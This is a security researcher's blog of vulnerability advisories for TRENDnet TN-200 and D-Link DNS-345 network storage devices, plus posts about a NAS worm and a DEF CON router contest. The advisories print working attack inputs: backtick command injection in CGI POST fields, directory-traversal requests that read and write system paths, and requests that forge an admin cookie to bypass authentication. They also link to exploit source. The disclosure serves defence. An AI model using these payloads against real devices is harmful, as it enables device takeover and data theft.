Thursday, January 22, 2015

[Exploit] TRENDnet TN-200/200 T1 Network Storage System

TRENDnet TN-200/200 T1 Network Storage System
Note: CVE-2014-1628 and CVE-2014-1630 are used in my N.A.S.ty Worm

Vulnerability: Command Injection

CVE: CVE-2014-1628

Description
The TRENDnet TN-200/200 T1 network storage system is susceptible to several command injection vulnerabilities, which allows an attacker to inject and execute arbitrary system commands. ISE created a proof of concept that when executed, grants an attacker full administrative control of the affected system.

—Vulnerable Pages—

POST /cgi-bin/system_mgr.cgi
POST Data - cmd=cgi_log_server&f_enable=1&f_ip=`cmd`

POST cgi-bin/remote_backup.cgi
POST Data - cmd=cgi_server_test&ip=`cmd`&s_type=2&direction=2&task=Test&keep_exist_file=0&local_path=undefined&incremental=0&encryption=0&rsync_user=Gimppy&rsync_pw=&ssh_user=&ssh_pw=&inc_num=-1

Attack Requirements
- Authenticated session or valid user credentials (CVE-2014-1629 Bypasses Auth.)
- Ability to access to TCP/80 or TCP/443 on the affected system.

Details
This is an authenticated vulnerability, but if used in conjunction with a Missing Function Level Access Control vulnerability (CVE-2014-1629), a remote adversary can call the “/cgi-bin/system_mgr.cgi” or “remote_backup.cgi” CGI program without authentication. This ultimately results in unauthenticated OS command injection attack, which is demonstrated in the stand alone proof of concept exploit and N.A.S.ty worm.

This exploit should work against other TRENDnet Network Storage Systems.

Impact
If an unauthenticated, remote attacker is able to communicate with port TCP/80 or TCP/443 on a vulnerable system, the attacker can assume full administrative control of the device by exploiting publicly disclosed vulnerabilities.

Vendor Recommendations
- Avoid calling shell commands when possible
- If an API does not exist, sanitize user input before passing it to a function or class method that executes system commands.

Solution
- There currently is not a solution to this problem.
- Restrict access to WAN and LAN network services.

Proof of Concept Exploit
- https://github.com/Gimppy042/exploits/blob/master/network_storage_exploits/trendnet_tn200_cve2014_1628.c




Vulnerability: Cross-Site Request Forgery
CVE: CVE-2014-1629

Description
The TRENDnet TN-200/200 T1 is susceptible to several Cross-Site Request Forgery attacks, which allows an attacker to forge HTML forms and execute actions on behalf of the target user.

Attack Requirements
- The victim must have an active web application session.
- The victim must follow a link crafted by an attacker (e.g., by clicking the link directly, or through some other mechanism such as redirection from a malicious site).
- The victim must have the necessary permissions to render and execute the forged HTTP.

Details
All HTML forms severed by the TRENDnet TN-200/200 T1 are susceptible to Cross-Site Request Forgery.

Impact
If an unauthenticated remote attacker is able to fool an authenticated user into clicking a malicious link, the attacker is able to launch an attack that has the capability to compromise the affected system.

Vendor Recommendations

- Cross-Site request forgery can be prevented by including an unpredictable token in each HTTP request submitted to the web server. At a minimum, these tokens should be unique to each user, but it is recommended that each HTML form contains unique tokens.
- In addition to HTML form tokens, HTTP referrer checking should be enabled
- Require users to re-authenticate before performing an application state change.

Solution
- There currently is not a solution to this problem.
- DO NOT STAY LOGGED INTO THE WEB MANAGEMENT INTERFACE.
- Restrict access to WAN and LAN network services.




Vulnerability: Missing Function Level Access Control (Authentication Bypass)
CVE: CVE-2014-1630

Description
The TRENDnet TN-200/200 T1 network storage system is susceptible to Missing Function Level Access Control (Authentication Bypass) attacks, which ultimately allows an attacker to arbitrarily call system functionality without first authenticating with the system.

Additionally, the cookie based authentication mechanism utilized by TRENDnet storage systems is severely broken and insecure. For example, TRENDnet uses an authentication cookie  named “username” with the value set to the username of the newly authenticated user. This is cryptographically insecure, and allows an adversarial user to hijack an authenticated session by guessing valid usernames of authenticated users.

Attack Requirements
- Ability to access to TCP/80 or TCP/443 on the affected system.

Details
- This vulnerability should be present in other TRENDnet Network Storage Systems.
- Missing Function Level Access Control (Authentication Bypass) is only present in firmware versions less than 1.02.
- Broken Session Management (insecure username cookie) is present in firmware versions greater than or equal to 1.02.
- The missing function level access control (Auth Bypass) and broken session management vulnerability should be split into two distinct issues. For clerical reasons, they have been combined into one vulnerability.

Impact
If an unauthenticated, remote attacker is able to communicate with port TCP/80 or TCP/443 on a vulnerable system, the attacker can assume full administrative control of the device by exploiting publicly disclosed vulnerabilities.

Vendor Recommendations

- Developers should be performing server-side authentication and authorization checks on all system resources.
- Proper session management should be utilized. Cookie values should be randomly generated using a secure generator.

Solution
- There currently is not a solution to this problem.
- Restrict access to WAN and LAN network services.

Proof of Concept Exploit
- CVE-2014-1630 is demonstrated in conjunction with CVE-2014-1628 -  https://github.com/Gimppy042/exploits/blob/master/network_storage_exploits/trendnet_tn200_cve2014_1628.c




Vulnerability: Multiple Directory Traversal Vulnerabilities

CVE: CVE-2014-2703

Description
The TRENDnet TN-200/200 T1 network storage system is susceptible to Directory Traversal attacks, which ultimately allows an attacker to assume full control of the affected system by writing to and reading from arbitrary file system locations.

Attack Requirements
- Authenticated session or valid user credentials (CVE-2014-1630 Bypasses Auth.)
- Ability to access to TCP/80 or TCP/443 on the affected system.

Details
This vulnerability should be present in other TRENDnet Network Storage Systems.

Impact
If an unauthenticated, remote attacker is able to communicate with port TCP/80 or TCP/443 on a vulnerable system, the attacker can assume full administrative control of the device by exploiting publicly disclosed vulnerabilities.

Vendor Recommendations

- Developers should refrain from using user supplied input in calls to the file system
- Developers should perform path canonicalization
- Properly configure network services.

Solution
- There currently is not a solution to this problem.
- Restrict access to WAN and LAN network services.

Proof of Concept Exploit
- Calls to “webfile_mgr.cgi” and “folder_tree.cgi” require authentication. An attacker can circumvent this by utilizing methods described by CVE-2014-1630.

—File Upload—

POST /cgi-bin/webfile_mgr.cgi HTTP/1.1
POST Data - cmd=cgi_folder_content&page=1&rp=10&query=&qtype=&f_field=false&used_dir=%2Fmnt%2FHD%2FHD_a2%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2f

POST /cgi-bin/webfile_mgr.cgi HTTP/1.1
POST Data - cmd=chk_file&path=%2Fmnt%2FHD%2FHD_a2%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2f&name=dlink.html




—File Download—

POST /cgi-bin/webfile_mgr.cgi HTTP/1.1
POST Data - cmd=cgi_compress&path=%2Fmnt%2FHD%2FHD_a2%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&type=Folder&name=php&os=UNIX


POST /cgi-bin/webfile_mgr.cgi HTTP/1.1
POST Data - cmd=cgi_download&path=%2Fmnt%2FHD%2FHD_a2%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&path1=%2Fmnt%2FHD%2FHD_a2%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fphp&name=php&type=Folder&browser=f&os=UNIX


—Directory Listing—

POST /cgi-bin/folder_tree.cgi HTTP/1.1
POST Data - dir=%2Fetc%2F&cmd=cgi_open_&show_file=&chk_flag=1&file_type=all&function_id=upnp_av




Vulnerability: Information Disclosure
CVE: CVE-2014-2704

Description
The TRENDnet TN-200/200 T1 network storage system is susceptible to Information Disclosure attacks, which allow an attacker to read arbitrary files from the “xml” and “common” directories located in the web root of the affected system.

Attack Requirements
- Ability to access to TCP/80 or TCP/443 on the affected system.

Details
This vulnerability should be present in other TRENDnet Network Storage Systems.

Impact
If an unauthenticated, remote attacker is able to communicate with port TCP/80 or TCP/443 on a vulnerable system, the attacker can access system files located on the device by exploiting publicly disclosed vulnerabilities.

Vendor Recommendations

- Developers should enforce authentication and authorization before granting access to any file located within the web root.
- Properly configure network services.

Solution
- There currently is not a solution to this problem.
- Restrict access to WAN and LAN network services.




Disclosure Timeline
- CVE Numbers Assigned - 1/21/2014 and 4/03/2014
- Vendor Notified - 8/19/2014
- Public Disclosure (no vendor response) - 1/22/2015

Credit
- Discovered By: Jacob Holcomb (@rootHak42) – Security Analyst @ Independent Security Evaluators
- Exploited By: Jacob Holcomb – Security Analyst (@rootHak42) @ Independent Security Evaluators

Wednesday, January 21, 2015

[Black Hat USA 2014 Video] My N.A.S.ty BH briefing!

Black Hat USA 2014 
 Network Attached Shell N.A.S.ty Systems that Store Network Accessible Shells

Note: I was sick and talked too much. I ran out of time! It was an honor to speak at both Black Hat USA  and Black Hat Europe in the same year (2014). I successfully turned the results I presented at Black Hat USA into a piece of self-replicating malware, which I later presented at Black Hat Europe (Much better presentation imo haha). Source code is currently unavailable for my N.A.S.ty worm prototype, but I expect to release it soon. Frequently check https://github.com/Gimppy042 frequently, as I will be updating it every so often.

[Exploit] D-Link DNS-345 Network Storage System

D-Link DNS-345 Network Storage System
Note: CVE-2014-2691 and CVE-2014-2692 are used in my N.A.S.ty Worm

Vulnerability: Command Injection
CVE: CVE-2014-2691

Description
The D-Link DNS-345 network storage system is susceptible to several command injection attacks, which allows an attacker to inject and execute arbitrary system commands. ISE created a proof of concept that when executed, grants an attacker full administrative control of the affected system.

Attack Requirements
- Authenticated session or valid user credentials (CVE-2014-2692 Bypasses Auth.)
- Ability to access to TCP/80 or TCP/443 on the affected system.

Details
This is an authenticated vulnerability, but if used in conjunction with a Missing Function Level Access Control vulnerability (below), a remote adversary can call the “/cgi-bin/system_mgr.cgi” program without authentication. This ultimately results in unauthenticated OS command injection attack, which is demonstrated in the stand alone proof of concept exploit and N.A.S.ty worm.

This exploit should work against other D-Link Network Storage Systems.

Impact
If an unauthenticated, remote attacker is able to communicate with port TCP/80 or TCP/443 on a vulnerable system, the attacker can assume full administrative control of the device by exploiting publicly disclosed vulnerabilities.

Vendor Recommendations
- Avoid calling shell commands when possible
- If an API does not exist, sanitize user input before passing it to a function or class method that executes system commands.

Solution
- There currently is not a solution to this problem.
- Restrict access to WAN and LAN network services.

Proof of Concept Exploit
- https://github.com/Gimppy042/exploits/blob/master/network_storage_exploits/dlink_dns345_cve2014_2691.c




Vulnerability: Missing Function Level Access Control (Authentication Bypass)
CVE: CVE-2014-2692

Description
The D-Link DNS-345 network storage system is susceptible to Missing Function Level Access Control (Authentication Bypass) attacks, which ultimately allows an attacker to arbitrarily call system functionality without first authenticating with the system.

Additionally, the cookie based authentication mechanism utilized by D-Link storage systems is severely broken and insecure. For example, D-Link uses an authentication cookie  named “username” with the value set to the username of the newly authenticated user. This is cryptographically insecure, and allows an adversarial user to hijack an authenticated session by guessing valid usernames of authenticated users.

Attack Requirements
- Ability to access to TCP/80 or TCP/443 on the affected system.

Details
- This vulnerability should be present in other D-Link Network Storage Systems.
- The missing function level access control (Auth Bypass) and broken session management vulnerability should be split into two distinct issues. For clerical reasons, they have been combined into one vulnerability.

Impact
If an unauthenticated, remote attacker is able to communicate with port TCP/80 or TCP/443 on a vulnerable system, the attacker can assume full administrative control of the device by exploiting publicly disclosed vulnerabilities.

Vendor Recommendations
- Developers should be performing server-side authentication and authorization checks on all system resources.
- Proper session management should be utilized. Cookie values should be randomly generated using a secure generator.

Solution
- There currently is not a solution to this problem.
- Restrict access to WAN and LAN network services.

Proof of Concept Exploit
- CVE-2014-2692 is demonstrated in conjunction with CVE-2014-2691 - https://github.com/Gimppy042/exploits/blob/master/network_storage_exploits/dlink_dns345_cve2014_2691.c




Vulnerability: Multiple Directory Traversal Vulnerabilities
CVE: CVE-2014-2693

Description
The D-Link DNS-345 network storage system is susceptible to Directory Traversal attacks, which ultimately allows an attacker to assume full control of the affected system by writing to and reading from arbitrary file system locations.

Attack Requirements
- Authenticated session or valid user credentials (CVE-2014-2692 Bypasses Auth.)
- Ability to access to TCP/80 or TCP/443 on the affected system.

Details
This vulnerability should be present in other D-Link Network Storage Systems.

Impact
If an unauthenticated, remote attacker is able to communicate with port TCP/80 or TCP/443 on a vulnerable system, the attacker can assume full administrative control of the device by exploiting publicly disclosed vulnerabilities.

Vendor Recommendations
- Developers should refrain from using user supplied input in calls to the file system
- Developers should perform path canonicalization
- Properly configure network services.

Solution
- There currently is not a solution to this problem.
- Restrict access to WAN and LAN network services.

Proof of Concept Exploit
- The following HTTP requests show how an attacker can read and write to the D-Link DNS-345 filesystem. Remember, while calls to “webfile_mgr.cgi require authentication”, an attacker can circumvent this by utilizing methods described by CVE-2014-2692.

—File Upload—

POST /cgi-bin/webfile_mgr.cgi HTTP/1.1
Host: 192.168.1.33
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:24.0) Gecko/20140207 Firefox/24.0 Iceweasel/24.3.0
Accept: application/xml, text/xml, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.33/web/web_file/web_file_server_main.html
Content-Length: 95
Cookie: username=admin
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

cmd=cgi_folder_content&page=1&rp=10&query=&qtype=&f_field=false&used_dir=%2Fmnt%2FHD%2FHD_a2%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2f


POST /cgi-bin/webfile_mgr.cgi HTTP/1.1
Host: 192.168.1.33
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:24.0) Gecko/20140207 Firefox/24.0 Iceweasel/24.3.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.33/web/web_file/web_file_server.html
Content-Length: 53
Cookie: username=admin
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

cmd=chk_file&path=%2Fmnt%2FHD%2FHD_a2%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2f&name=dlink.html



—File Download—

POST /cgi-bin/webfile_mgr.cgi HTTP/1.1
Host: 192.168.1.33
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:24.0) Gecko/20140207 Firefox/24.0 Iceweasel/24.3.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.33/web/web_file/web_file_server.html
Content-Length: 111
Cookie: username=admin
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

cmd=cgi_compress&path=%2Fmnt%2FHD%2FHD_a2%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&type=Folder&name=php&os=UNIX



POST /cgi-bin/webfile_mgr.cgi HTTP/1.1
Host: 192.168.1.33
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:24.0) Gecko/20140207 Firefox/24.0 Iceweasel/24.3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.33/web/web_file/web_file_server_main.html
Cookie: username=admin
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 194

cmd=cgi_download&path=%2Fmnt%2FHD%2FHD_a2%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&path1=%2Fmnt%2FHD%2FHD_a2%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fphp&name=php&type=Folder&browser=f&os=UNIX





Disclosure Timeline
- CVE Numbers Assigned - 4/03/2014
- Vendor Notified - 8/19/2014
- Public Disclosure (no vendor response) - 1/21/2015

Credit
- Discovered By: Jacob Holcomb (@rootHak42) – Security Analyst @ Independent Security Evaluators
- Exploited By: Jacob Holcomb (@rootHak42) – Security Analyst @ Independent Security Evaluators

[Exploit] N.A.S.ty Worm Demo

N.A.S.ty VIDEO COMING SOON!
PROTOTYPE SOURCE CODE WILL BE RELEASED SOON.

In the interim, check out my brief segment on Hacker Hotshots where I discuss my network storage research and demonstrate the capabilities of self-replicating malware!!!
 

Friday, July 25, 2014

SOHOpelessly Broken - DEFCON Router Hacking Contest

http://sohopelesslybroken.com/

This year at DEFCON 22, for the first time ever Independent Security Evaluators (ISE) and the Electronic Frontier Foundation (EFF) are hosting a no-holds-barred router hacking competition. You're hereby challenged to compete in one or both tracks of the SOHOpelessly BROKEN contest


HACK AND GET PAID! #SOHOpelesslyBroken